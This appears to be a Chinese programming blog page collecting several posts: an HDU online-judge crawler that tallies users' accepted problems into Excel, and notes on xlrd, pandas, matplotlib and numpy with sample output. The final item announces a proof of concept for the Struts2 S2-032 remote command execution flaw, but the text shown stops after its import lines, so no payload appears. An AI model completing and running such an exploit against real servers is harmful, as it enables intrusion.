标签: python

Hduoj用户AC题数统计爬虫

趁着前几天出去比赛的空余时间瞎写完了

一向写python都是现写现查库怎么用

写这个主要是为了班里统计方便 ,但现在应该用不上了2333

写的挺垃圾,也是第一次搞这个,因为库太好用了感觉自己写的也没啥水平哈哈

其中主要点是判断指定日期的做题AC数

用了下用户实时的提交页面

http://acm.hdu.edu.cn/status.php?first=&pid=&user=aaa&lang=0&status=0

1.爬取该用户从最新一次提交直到指定起始日期为止的所有提交记录

2.判断时间是否符合,顺便学习了下datetime

  •    因为提交记录是按时间从新到旧排列的,所以晚于终止日期的记录直接跳过,直到遇见早于起始日期的记录时跳出循环
  •    需要注意的是:如果这个用户在指定起始日期及之前从未提交过,循环永远遇不到更早的记录,会造成死循环。所以要判断当前是否已经是最后一页;因为get参数里没有页数,所以判断first是否重复就ok

3.判断是否ac

4.丢到dict

 

分享一下渣渣代码

# encoding=utf-8
import requests
import re
import xlrd
import xlwt
from bs4 import BeautifulSoup
import datetime


def save_mysql():
    """Placeholder for a MySQL export backend; it currently does nothing."""
    return None


def save_excel(users, Allsolved, pid, sum):
    """Dump the crawl results into ``Acm<start>to<end>.xls``.

    The four arguments are parallel sequences; element ``i`` of each one is
    written to spreadsheet row ``i + 1`` (row 0 holds the headers):

    :param users: user IDs, written to column 0.
    :param Allsolved: total solved count per user, written to column 2.
    :param pid: per-user value describing the problems accepted in the date
        range, written to column 3 exactly as received.
    :param sum: number of problems accepted in the date range per user,
        written to column 1.

    The module-level ``start`` and ``end`` strings are read to build both the
    header text and the output file name.
    """
    workbook = xlwt.Workbook(encoding='utf-8')  # workbook setup
    sheet = workbook.add_sheet('sheet1', cell_overwrite_ok=True)
    date_span = start + 'to' + end

    id_col, range_solved_col, total_solved_col, problems_col = 0, 1, 2, 3
    headers = [
        'ID',
        u'指定日期累计AC题数' + '(' + date_span + ')',
        u'总共已AC题数',
        u'指定日期AC题号',
    ]
    print(u'\n准备将数据存入表格...')
    for col, title in enumerate(headers):
        sheet.write(0, col, title)
    sheet.col(range_solved_col).width = 256 * 20

    # Data columns are filled one after another, each starting at row 1.
    columns = (
        (id_col, users),
        (total_solved_col, Allsolved),
        (problems_col, pid),
        (range_solved_col, sum),
    )
    for col, values in columns:
        for row, value in enumerate(values, 1):
            sheet.write(row, col, value)

    workbook.save('Acm' + date_span + '.xls')
    print(u'\n录入成功!')


# Patterns applied to the HDU user profile page.
_TITLE_RE = re.compile(r'>(.*)</h1>')
_SOLVED_RE = re.compile(r'Solved</td><td align=center>([0-9]+)<')
# Seconds to wait for the site before giving up instead of hanging forever.
_REQUEST_TIMEOUT = 30


def _parse_status_rows(html):
    """Return the submissions listed on one status page as a list of dicts.

    Each dict has the keys ``Runid``, ``Subtime``, ``Status`` and ``Id``,
    taken from the first four cells of every non-header row of the fourth
    ``<table>`` on the page.  An empty list is returned when that table is
    missing or has no data rows.
    """
    tables = BeautifulSoup(html, 'lxml').findAll('table')
    if len(tables) < 4:
        return []
    keys = ('Runid', 'Subtime', 'Status', 'Id')
    rows = []
    for tr in tables[3].findAll('tr')[1:]:
        cells = [td.getText() for td in tr.findAll('td')[:4]]
        if len(cells) < len(keys):
            continue  # not a submission row
        rows.append(dict(zip(keys, cells)))
    return rows


def _accepted_in_range(user):
    """Collect the distinct problems ``user`` got Accepted within [d1, d2].

    Walks the status pages by repeatedly requesting ``first=<last run id - 1>``
    and stops once a submission dated before the module-level ``d1`` is seen
    or a page comes back without rows.  The code relies on the site listing
    submissions newest first.

    :returns: ``(count, repid)`` where ``repid`` keeps the layout the
        spreadsheet export receives: ``['|', id1, ' ', id2, ' ', ...]``.
    """
    count = 0
    first = '99999999'
    repid = ['|']  # leading marker, then "<problem id>, ' '" pairs
    seen = set()   # problem ids already counted (deduplication)
    keep_going = True
    while keep_going:
        page = requests.get(
            "http://acm.hdu.edu.cn/status.php",
            params=[('first', first), ('pid', ''), ('user', user),
                    ('lang', '0'), ('status', '0')],
            timeout=_REQUEST_TIMEOUT)
        rows = _parse_status_rows(page.text)
        if not rows:
            # Past the user's oldest submission (or the user never submitted):
            # without this exit the loop would request the same page forever.
            break
        fresh = []
        for row in rows:
            # Subtime looks like "YYYY-MM-DD HH:MM:SS"; drop the time part.
            day = datetime.datetime.strptime(row['Subtime'][0:-9], '%Y-%m-%d')
            if day < d1:
                keep_going = False
            elif day <= d2 and row['Status'] == 'Accepted' and row['Id'] not in seen:
                seen.add(row['Id'])
                repid.append(row['Id'])
                repid.append(' ')
                fresh.append(row)
        for row in fresh:
            print(row)
        count += len(fresh)
        # The next page starts just below the last run id shown on this one.
        first = str(int(rows[-1]['Runid']) - 1)
    return count, repid


def run(users):
    """Crawl HDU OJ for every user and hand the statistics to ``save_excel``.

    For each user this reads the total solved count from the profile page and
    then counts the distinct problems accepted between the module-level ``d1``
    and ``d2`` datetimes (both inclusive).

    :param users: sequence of HDU account names.
    """
    all_solved = []
    problem_ids = []
    range_counts = []
    for user in users:
        # ---- total number of problems solved so far ----
        profile = requests.get("http://acm.hdu.edu.cn/userstatus.php",
                               params={'user': user},
                               timeout=_REQUEST_TIMEOUT)
        name = _TITLE_RE.search(profile.text)
        solved = _SOLVED_RE.search(profile.text)
        # A profile page without the expected markup (e.g. an unknown account)
        # must not abort the whole run; placeholders keep the export rows
        # aligned with ``users``.
        display_name = name.group(1) if name else user
        solved_total = solved.group(1) if solved else '0'
        print(display_name + " " + solved_total)
        all_solved.append(solved_total)

        # ---- accepted problems inside the requested date range ----
        print(user)
        count, repid = _accepted_in_range(user)
        print('------')
        print(count)
        print('------')
        problem_ids.append(repid)
        range_counts.append(count)
    save_excel(users, all_solved, problem_ids, range_counts)


def main():
    """Read the user IDs from column 0 of ``sheet1`` in ./acmid.xlsx and crawl them."""
    book = xlrd.open_workbook('./acmid.xlsx')
    sheet = book.sheet_by_name('sheet1')
    users = []
    for cell in sheet.col_values(0):
        # xlrd hands numeric cells back as floats, so an all-digit ID such as
        # 12345 arrives as 12345.0; turn it back into the text the site expects.
        if isinstance(cell, float):
            cell = u'%d' % cell if cell.is_integer() else u'%s' % cell
        if cell == u'':
            continue  # blank cell, nothing to look up
        users.append(cell)
    print(users)
    run(users)


if __name__ == '__main__':
    # Prompt for the inclusive date range; both dates are parsed as YYYY-MM-DD.
    print '日期输入格式:年-月-日'
    start = raw_input("起始日期:")
    end = raw_input("终止日期:")
    # start/end (raw text) and d1/d2 (parsed datetimes) are module-level names:
    # save_excel() reads start/end and run() reads d1/d2.
    d1 = datetime.datetime.strptime(start, '%Y-%m-%d')
    d2 = datetime.datetime.strptime(end, '%Y-%m-%d')
    main()

 

 

xlrd基本操作并配合matplotlib绘图笔记

一个简单的小例子快速了解如何利用xlrd读取excel并借助plt绘图

//之前代码有误,导致上图显示女生数量与男生一样,代码已改正

#encoding=utf-8
import xlrd
import matplotlib.pylab as plt
from pylab import *
def main():
    """Demonstrate basic xlrd reads, then plot a boy/girl bar chart.

    Part one prints the sheet name, dimensions, rows and one column of
    ./pdtest.xlsx and counts how many values in column 1 equal 2.
    Part two counts the gender values found in column 4 of the first sheet of
    ./reg.xls and shows the two totals as a Matplotlib bar chart.
    """
    book = xlrd.open_workbook('./pdtest.xlsx')
    sheet_name = book.sheet_names()[0]  # name of the sheet at index 0
    print(sheet_name)
    sheet = book.sheet_by_name('sheet1')
    rows = sheet.nrows  # number of rows
    cols = sheet.ncols  # number of columns
    print('%s %s' % (rows, cols))
    row_data = sheet.row_values(0)
    col_data = sheet.col_values(0)
    print('%s %s' % (row_data, col_data))
    cell = sheet.cell_value(1, 2)
    print(cell)
    for i in range(rows):  # every row of the sheet
        print(sheet.row_values(i))
    col1 = sheet.col_values(1)[1:]  # column 1 without its header cell
    print(col1)
    k = 0
    for i in col1:
        print(int(i))
        if int(i) == int('2'):
            k += 1
    print(k)

    book1 = xlrd.open_workbook('./reg.xls')
    # Named reg_sheet rather than ``list`` so the builtin is not shadowed.
    reg_sheet = book1.sheets()[0]
    nrows = reg_sheet.nrows
    print(nrows)
    print("------------------")
    col2 = reg_sheet.col_values(4)[1:]
    g = col2.count(u"\u5973")  # cells equal to the character for "female"
    b = col2.count(u"\u7537")  # cells equal to the character for "male"
    print('%s %s' % (g, b))

    mpl.rcParams['font.sans-serif'] = ['SimHei']  # font able to render the CJK labels
    mpl.rcParams['axes.unicode_minus'] = False
    plt.figure(1)
    # The bar position is passed positionally: the ``left=`` keyword was
    # renamed to ``x`` and later removed, while the first positional argument
    # is accepted by every Matplotlib version.
    plt.bar(0, height=b, width=0.35, align="center", color="b", label="boy")
    plt.bar(0.5, height=g, width=0.35, align="center", color="y", label="girl")
    plt.title(u"2017太原市中考性别分布[柱状图]")
    plt.xlabel(u"性别")
    plt.ylabel(u"人数")
    plt.xticks((0, 0.5), (u"男", u"女"))
    plt.text(0, b+0.05, "%d" % b, ha="center", va="bottom")
    # Per the author's note, an earlier revision passed b instead of g below,
    # which made the girl bar show the boy count.
    plt.text(0.5, g+0.05, "%d" % g, ha="center", va="bottom")
    #plt.legend(loc="upper left")
    plt.show()


# Run the xlrd/matplotlib demo only when this file is executed as a script.
if __name__ == '__main__':
    main()

output:

sheet1
5 3
[u'', u'man', u'woman'] [u'', u'a', u'b', u'c', u'd']
1.0
[u'', u'man', u'woman']
[u'a', 2.0, 1.0]
[u'b', 6.0, 3.0]
[u'c', 2.0, 4.0]
[u'd', 1.0, 6.0]
[2.0, 6.0, 2.0, 1.0]
2
6
2
1
2
41609
------------------
20445 21163

 

 

 

Pandas基本操作笔记

Python Data Analysis Library 或 pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。Pandas 纳入了大量库和一些标准的数据模型,提供了高效地操作大型数据集所需的工具。pandas提供了大量能使我们快速便捷地处理数据的函数和方法。你很快就会发现,它是使Python成为强大而高效的数据分析环境的重要因素之一。

#encoding=utf-8
import numpy as np
import pandas as pd
def main():
    """Tour of basic pandas DataFrame operations; every step prints its result."""
    # ---- build the tables ----
    dates = pd.date_range("20170801", periods=8)
    # 8x5 frame of random normals indexed by the eight dates
    df = pd.DataFrame(np.random.randn(8, 5), index=dates, columns=list("ABCDE"))
    print(df)
    mixed = pd.DataFrame({
        "A": np.random.randint(1, 10, 8),
        "B": pd.date_range("20170707", periods=8),
    })
    print(mixed)

    # ---- basic inspection and selection ----
    print(df.head(3))  # first three rows
    print(df.tail(3))  # last three rows
    print(df.index)
    print(df.values)
    print(df.T)  # transpose
    print(df.sort_values("C"))  # sort rows by column C, ascending
    print(df.sort_index(axis=1, ascending=False))  # sort columns by label, descending
    print(df.describe())  # summary statistics
    print(df["A"])  # a single column
    print(df[:3])
    print(df["20170801":"20170806"])
    print(df.loc[dates[0]])
    print(df.loc["20170802":"20170806", ["B", "D"]])
    print(df.at[dates[0], "C"])
    print(df.iloc[1:3, 2:4])
    print(df.iloc[1, 4])  # 2nd row, 5th column
    print(df[df.B > 0])
    print(df[df < 0])
    print(df[df["E"].isin([1, 2])])

    # ---- basic assignment ----
    series_f = pd.Series(list(range(10, 18)),
                         index=pd.date_range("20170801", periods=8))
    print(series_f)
    df["F"] = series_f
    print(df)
    df.at[dates[0], "A"] = 0
    print(df)
    df.iat[1, 4] = 666
    df.loc[:, "D"] = np.array([4] * len(df))
    print(df)
    positive = df.copy()  # independent copy
    positive[positive < 0] = -positive  # flip the negative entries to positive
    print(positive)


# Run the pandas walkthrough only when this file is executed as a script.
if __name__ == '__main__':
    main()

output:

                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
   A          B
0  9 2017-07-07
1  3 2017-07-08
2  3 2017-07-09
3  6 2017-07-10
4  6 2017-07-11
5  4 2017-07-12
6  5 2017-07-13
7  6 2017-07-14
                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
                   A         B         C         D         E
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
DatetimeIndex(['2017-08-01', '2017-08-02', '2017-08-03', '2017-08-04',
               '2017-08-05', '2017-08-06', '2017-08-07', '2017-08-08'],
              dtype='datetime64[ns]', freq='D')
[[ 1.07524464 -0.60505755  0.71275536  2.41815902 -0.02894002]
 [-1.51331977 -0.51708246  1.36323759  0.6185221  -0.45040032]
 [-2.26771071 -2.23593917  2.28891947  2.60836214 -1.1816333 ]
 [-0.27608484 -1.13021474 -0.12282251 -0.54247504 -0.33188383]
 [-0.23136532 -0.48824379  1.75736371 -0.96758439 -1.44857541]
 [ 0.37751303  0.05175454  0.32217176 -0.46223914  0.82356261]
 [ 1.00914409 -0.67055311  0.26280966 -0.86527427 -0.72155023]
 [-0.25735124  0.98478455 -0.29728085 -0.23039814  0.69747694]]
   2017-08-01  2017-08-02  2017-08-03  2017-08-04  2017-08-05  2017-08-06  \
A    1.075245   -1.513320   -2.267711   -0.276085   -0.231365    0.377513   
B   -0.605058   -0.517082   -2.235939   -1.130215   -0.488244    0.051755   
C    0.712755    1.363238    2.288919   -0.122823    1.757364    0.322172   
D    2.418159    0.618522    2.608362   -0.542475   -0.967584   -0.462239   
E   -0.028940   -0.450400   -1.181633   -0.331884   -1.448575    0.823563   

   2017-08-07  2017-08-08  
A    1.009144   -0.257351  
B   -0.670553    0.984785  
C    0.262810   -0.297281  
D   -0.865274   -0.230398  
E   -0.721550    0.697477  
                   A         B         C         D         E
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
                   E         D         C         B         A
2017-08-01 -0.028940  2.418159  0.712755 -0.605058  1.075245
2017-08-02 -0.450400  0.618522  1.363238 -0.517082 -1.513320
2017-08-03 -1.181633  2.608362  2.288919 -2.235939 -2.267711
2017-08-04 -0.331884 -0.542475 -0.122823 -1.130215 -0.276085
2017-08-05 -1.448575 -0.967584  1.757364 -0.488244 -0.231365
2017-08-06  0.823563 -0.462239  0.322172  0.051755  0.377513
2017-08-07 -0.721550 -0.865274  0.262810 -0.670553  1.009144
2017-08-08  0.697477 -0.230398 -0.297281  0.984785 -0.257351
              A         B         C         D         E
count  8.000000  8.000000  8.000000  8.000000  8.000000
mean  -0.260491 -0.576319  0.785894  0.322134 -0.330243
std    1.158991  0.919133  0.928070  1.436732  0.812523
min   -2.267711 -2.235939 -0.297281 -0.967584 -1.448575
25%   -0.585394 -0.785469  0.166402 -0.623175 -0.836571
50%   -0.244358 -0.561070  0.517464 -0.346319 -0.391142
75%    0.535421 -0.353244  1.461769  1.068431  0.152664
max    1.075245  0.984785  2.288919  2.608362  0.823563
2017-08-01    1.075245
2017-08-02   -1.513320
2017-08-03   -2.267711
2017-08-04   -0.276085
2017-08-05   -0.231365
2017-08-06    0.377513
2017-08-07    1.009144
2017-08-08   -0.257351
Freq: D, Name: A, dtype: float64
                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
                   A         B         C         D         E
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
A    1.075245
B   -0.605058
C    0.712755
D    2.418159
E   -0.028940
Name: 2017-08-01 00:00:00, dtype: float64
                   B         D
2017-08-02 -0.517082  0.618522
2017-08-03 -2.235939  2.608362
2017-08-04 -1.130215 -0.542475
2017-08-05 -0.488244 -0.967584
2017-08-06  0.051755 -0.462239
0.71275536229
                   C         D
2017-08-02  1.363238  0.618522
2017-08-03  2.288919  2.608362
-0.45040032497
                   A         B         C         D         E
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477
                   A         B         C         D         E
2017-08-01       NaN -0.605058       NaN       NaN -0.028940
2017-08-02 -1.513320 -0.517082       NaN       NaN -0.450400
2017-08-03 -2.267711 -2.235939       NaN       NaN -1.181633
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884
2017-08-05 -0.231365 -0.488244       NaN -0.967584 -1.448575
2017-08-06       NaN       NaN       NaN -0.462239       NaN
2017-08-07       NaN -0.670553       NaN -0.865274 -0.721550
2017-08-08 -0.257351       NaN -0.297281 -0.230398       NaN
Empty DataFrame
Columns: [A, B, C, D, E]
Index: []
2017-08-01    10
2017-08-02    11
2017-08-03    12
2017-08-04    13
2017-08-05    14
2017-08-06    15
2017-08-07    16
2017-08-08    17
Freq: D, dtype: int64
                   A         B         C         D         E   F
2017-08-01  1.075245 -0.605058  0.712755  2.418159 -0.028940  10
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400  11
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633  12
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884  13
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575  14
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563  15
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550  16
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477  17
                   A         B         C         D         E   F
2017-08-01  0.000000 -0.605058  0.712755  2.418159 -0.028940  10
2017-08-02 -1.513320 -0.517082  1.363238  0.618522 -0.450400  11
2017-08-03 -2.267711 -2.235939  2.288919  2.608362 -1.181633  12
2017-08-04 -0.276085 -1.130215 -0.122823 -0.542475 -0.331884  13
2017-08-05 -0.231365 -0.488244  1.757364 -0.967584 -1.448575  14
2017-08-06  0.377513  0.051755  0.322172 -0.462239  0.823563  15
2017-08-07  1.009144 -0.670553  0.262810 -0.865274 -0.721550  16
2017-08-08 -0.257351  0.984785 -0.297281 -0.230398  0.697477  17
                   A         B         C  D           E   F
2017-08-01  0.000000 -0.605058  0.712755  4   -0.028940  10
2017-08-02 -1.513320 -0.517082  1.363238  4  666.000000  11
2017-08-03 -2.267711 -2.235939  2.288919  4   -1.181633  12
2017-08-04 -0.276085 -1.130215 -0.122823  4   -0.331884  13
2017-08-05 -0.231365 -0.488244  1.757364  4   -1.448575  14
2017-08-06  0.377513  0.051755  0.322172  4    0.823563  15
2017-08-07  1.009144 -0.670553  0.262810  4   -0.721550  16
2017-08-08 -0.257351  0.984785 -0.297281  4    0.697477  17
                   A         B         C  D           E   F
2017-08-01  0.000000  0.605058  0.712755  4    0.028940  10
2017-08-02  1.513320  0.517082  1.363238  4  666.000000  11
2017-08-03  2.267711  2.235939  2.288919  4    1.181633  12
2017-08-04  0.276085  1.130215  0.122823  4    0.331884  13
2017-08-05  0.231365  0.488244  1.757364  4    1.448575  14
2017-08-06  0.377513  0.051755  0.322172  4    0.823563  15
2017-08-07  1.009144  0.670553  0.262810  4    0.721550  16
2017-08-08  0.257351  0.984785  0.297281  4    0.697477  17

 

Matplotlib基本图形笔记

#encoding=utf-8
import matplotlib.pyplot as plt
import numpy as np



# Scatter plot
fig=plt.figure()# the figure (canvas) shared by all subplots below
ax=fig.add_subplot(3,2,1)# 3 rows x 2 columns grid, first cell
n=128
# np.random.normal(loc, scale, size): loc is the mean (centre of the
# distribution), scale the standard deviation (larger -> flatter and wider),
# size the output shape (None would return a single value).
X=np.random.normal(0,1,n)
Y=np.random.normal(0,1,n)
T=np.arctan2(X,Y)
#print X,Y,T
#plt.axes([0.025,0.025,0.95,0.95])# axes([x,y,xs,ys]): x/y position of the drawing area, xs/ys its extent to the right/upwards
ax.scatter(X,Y,s=75,c=T,alpha=0.5)# scatter with marker size, colour values and opacity
plt.xlim(-1.5,1.5),plt.xticks([])# x range; empty list hides the tick marks
plt.ylim(-1.5,1.5),plt.yticks([])
plt.axis()# query the current axis limits (no arguments change nothing)
plt.title("scatter")
plt.xlabel("x")
plt.ylabel("y")


# Bar chart
ax=fig.add_subplot(322)
n=10
X=np.arange(n)
Y1=(1-X/float(n+1))
Y2=(1-X/float(n))
#print X,Y1,Y2
ax.bar(X,+Y1,facecolor="#9999FF",edgecolor="white")
ax.bar(X,-Y2,facecolor="#FF2222",edgecolor="white")
for x,y in zip(X,Y1):
    # va="bottom" anchors the bottom edge of the text at the given y, i.e.
    # the label sits above the bar.  rotation is given as a number: current
    # Matplotlib only accepts a number or 'horizontal'/'vertical', so the
    # string "45" raises ValueError there.
    plt.text(x+0.1,+y+0.05,"%.2f"%y,ha="center",va="bottom",rotation=45)
for x,y in zip(X,Y2):
    plt.text(x+0.1,-y-0.05,"%.2f"%y,ha="center",va="top")
plt.title("bar")
plt.yticks([])
plt.xticks([])



# Pie chart
ax=fig.add_subplot(323)
n=20
Z=np.ones(n)
Z[-1]*=2# make the last wedge twice as large as the others
# colours are grey levels given as float strings in [0, 1)
ax.pie(Z,explode=Z*0.05,colors=["%f"%(i/float(n)) for i in range(n)],labels=["%.2f"%(i/float(n)) for i in range(n)])
plt.gca().set_aspect("equal")
plt.xticks([])
plt.yticks([])
plt.title("pie")


# Polar plot
fig.add_subplot(324,polar=True)
n=20
t=np.arange(0.0,2*np.pi,2*np.pi/n)
r=10*np.random.rand(n)
plt.polar(t,r)
plt.title("polar")



# 3D line
from mpl_toolkits.mplot3d import Axes3D# importing Axes3D registers the "3d" projection on older Matplotlib
fig.add_subplot(313,projection="3d")# bottom third of a 3x1 grid
plt.plot([1,3,5,6,7,9],[4,2,2,1,2,3],[6,8,8,7,8,2],linestyle="-.")
plt.title("3D")



#plt.savefig("./fig.png")# save to file
plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)# extra padding around the figure edge and between subplots, in units of the font size
plt.show()

 

matplotlib基本绘图笔记

matplotlib基本绘图笔记,跟我一起来绘制一个丑陋的三角函数图吧!

 

#encoding=utf-8

import numpy as np
import matplotlib.pyplot as plt


# Basic plot setup
x=np.linspace(-np.pi,np.pi,256,endpoint=True)# 256 samples over [-pi, pi]; endpoint=True includes the last point
c,s=np.cos(x),np.sin(x)
plt.figure(1)# make figure 1 the current figure
plt.plot(x,c,color="blue",linewidth=1.5,linestyle="-",label="cos",alpha=0.5)# plot(x, y, colour, line width, line style, legend label, opacity)
plt.plot(x,s,"r*",label="sin")# format string "r*": r -> red, * -> star markers
plt.title("testruilin cos sin")# figure title


# Axis spines
ax=plt.gca()# the current Axes, used to edit the spines
ax.spines["right"].set_color("none")# hide the right spine
ax.spines["top"].set_color("none")
ax.spines["left"].set_position(("data",0))# move the left spine to data coordinate 0
ax.spines["bottom"].set_position(("data",0))


# Tick marks and tick labels
ax.xaxis.set_ticks_position("bottom")# draw the x ticks on the bottom spine
ax.yaxis.set_ticks_position("left")
plt.yticks(np.linspace(-1,1,5,endpoint=True))# five y ticks from -1 to 1
plt.xlim(-5,5)# x-axis range
for label in ax.get_xticklabels()+ax.get_yticklabels():# style every tick label
    label.set_fontsize(18)
    label.set_bbox(dict(facecolor="white",edgecolor="black",alpha=0.3))


# Miscellaneous
plt.grid()# grid lines
plt.legend(loc="upper left")# legend position
#plt.axis([-1,2,0.5,1])# explicit view limits (disabled)
plt.fill_between(x,np.abs(x)<0.8,c,c>0.1,color="green",alpha=0.4)# positional args are x, y1, y2, where: y1 is the boolean mask |x|<0.8 (drawn as 1 or 0), y2 is the cosine curve, and only the spans where cos(x)>0.1 are filled between them


# Annotation
t=1
plt.plot([t,t],[0,np.cos(t)],"y",linewidth=2.2,linestyle="--")# dashed segment joining (t, 0) and (t, cos(t))
plt.annotate("cos(1)",xy=(t,np.cos(t)),xycoords="data",xytext=(+10,+30),textcoords="offset points",arrowprops=dict(arrowstyle="->",connectionstyle="arc3,rad=0.3"))
# annotate: xy is the annotated point in data coordinates; xytext=(+10,+30) with textcoords="offset points" places the label at an offset relative to xy; arrowprops selects the arrow style and its curvature



plt.show()# display the figure

 

numpy常用操作笔记

#encoding=utf-8
import numpy as np

lst=[[1,2,3],[6,7,8]]
print (type(lst))
np_lst=np.array(lst)
print (type(np_lst))
# np.float was only an alias of the builtin float and was removed in
# NumPy 1.24; dtype=float selects the same float64 dtype on every version.
np_lst=np.array(lst,dtype=float)
print (np_lst)
print (np_lst.shape)# (rows, columns)
print (np_lst.ndim)# number of dimensions
print (np_lst.dtype)# element type
print (np_lst.itemsize)# bytes per element
print (np_lst.size)# total number of elements

print (np.zeros([2,4]))# array of zeros with the given shape
print (np.ones([3,2]))
print (np.random.rand())# one uniform random number
print (np.random.rand(2,4))
print (np.random.randint(1,10,3))# three random integers from 1 to 9 (upper bound is exclusive)
print (np.random.choice([1,2,3,5,10,100,666]))# pick one of the listed values at random
print (np.random.beta(1,10,100))# 100 samples from a beta distribution

print (np.arange(1,11).reshape([2,-1]))# 1..10 arranged as 2 rows x 5 columns

# Named arr3d rather than ``list`` so the builtin is not shadowed.
arr3d=np.array([[[1,2,3],
                [4,5,6]],
               [[7,8,9],
                [10,11,12]]
               ])
print (arr3d.sum(axis=0))# sum over the outermost axis: 1+7 2+8 3+9 4+10 5+11 6+12
print (arr3d.sum(axis=1))# sum over the middle axis: 1+4 2+5 3+6 7+10 8+11 9+12
print (arr3d.sum(axis=2))# sum over the innermost axis: 1+2+3 4+5+6 7+8+9 10+11+12
print (arr3d.max(axis=1))# maximum along axis 1
print (arr3d.min(axis=2))# minimum along axis 2

lst1=np.array([1,2,3])
lst2=np.array([10,11,12])
print (np.concatenate((lst1,lst2),axis=0))# join end to end
print (np.vstack((lst1,lst2)))# stack vertically -> two rows
print (np.hstack((lst1,lst2)))# stack horizontally -> one row
print (np.split(lst1,3))# split into three equal parts

output:

<type 'list'>
<type 'numpy.ndarray'>
[[ 1.  2.  3.]
 [ 6.  7.  8.]]
(2, 3)
2
float64
8
6
[[ 0.  0.  0.  0.]
 [ 0.  0.  0.  0.]]
[[ 1.  1.]
 [ 1.  1.]
 [ 1.  1.]]
0.0790300286594
[[ 0.40570725  0.40072322  0.75697423  0.45873189]
 [ 0.84684053  0.80063956  0.02231413  0.57768334]]
[4 5 8]
10
[  1.98939407e-02   1.61285413e-02   1.18716706e-02   8.10961771e-02
   1.63533368e-01   1.44668421e-01   5.11693434e-02   6.59941834e-02
   2.23286959e-02   2.15972016e-01   8.63734013e-02   8.06557908e-02
   1.22880147e-01   1.09686347e-02   6.54980124e-02   1.98280109e-03
   4.08960959e-05   4.99724974e-02   4.46814021e-02   1.38706779e-01
   1.24582838e-01   5.32977093e-02   1.01838024e-01   2.46115301e-01
   6.15260218e-03   1.08537025e-01   1.69927681e-02   1.03185373e-01
   2.02785750e-02   4.68360049e-02   2.35353598e-02   1.53166093e-01
   7.08847154e-02   1.43549143e-02   9.55657510e-02   7.62737256e-02
   5.94670869e-03   5.71465328e-03   3.98867568e-02   6.37016822e-02
   9.69537649e-02   3.52414465e-02   5.60588196e-03   1.45640846e-01
   3.06005428e-02   7.66577878e-02   1.98901419e-02   1.04611224e-01
   1.45486287e-02   4.63747783e-03   1.00559794e-01   4.14864166e-02
   6.97617286e-02   1.21598675e-02   5.18675502e-02   2.67329995e-01
   2.71693357e-01   7.61304550e-02   7.19672528e-02   6.30126936e-03
   3.79026503e-02   2.35909430e-01   5.86051618e-02   2.11428839e-01
   1.35133707e-01   6.62907241e-02   1.38296699e-01   2.88886522e-01
   2.40987292e-02   1.76062934e-02   1.90230382e-01   2.09219429e-01
   3.40778112e-02   4.66014797e-02   5.47428038e-03   2.20511410e-02
   3.19067152e-02   2.47324231e-02   3.66452719e-02   2.97249683e-02
   2.26196050e-01   1.59556704e-02   5.66573658e-04   1.44624707e-01
   8.91173413e-02   4.21186597e-02   3.77105859e-03   2.68561111e-01
   1.88337068e-02   1.12529504e-01   1.14325549e-01   6.22131659e-04
   4.74532828e-01   1.57684391e-01   2.60435883e-02   1.53169399e-03
   2.44662204e-02   2.86626061e-02   1.47198619e-01   4.32705246e-02]
[[ 1  2  3  4  5]
 [ 6  7  8  9 10]]
[[ 8 10 12]
 [14 16 18]]
[[ 5  7  9]
 [17 19 21]]
[[ 6 15]
 [24 33]]
[[ 4  5  6]
 [10 11 12]]
[[ 1  4]
 [ 7 10]]
[ 1  2  3 10 11 12]
[[ 1  2  3]
 [10 11 12]]
[ 1  2  3 10 11 12]
[array([1]), array([2]), array([3])]

 

S2-032 远程命令执行 (POC@Tangscan)

前段时间很火的S2-032 远程命令执行

import re
import string
from StringIO import StringIO
from thirdparty import requests
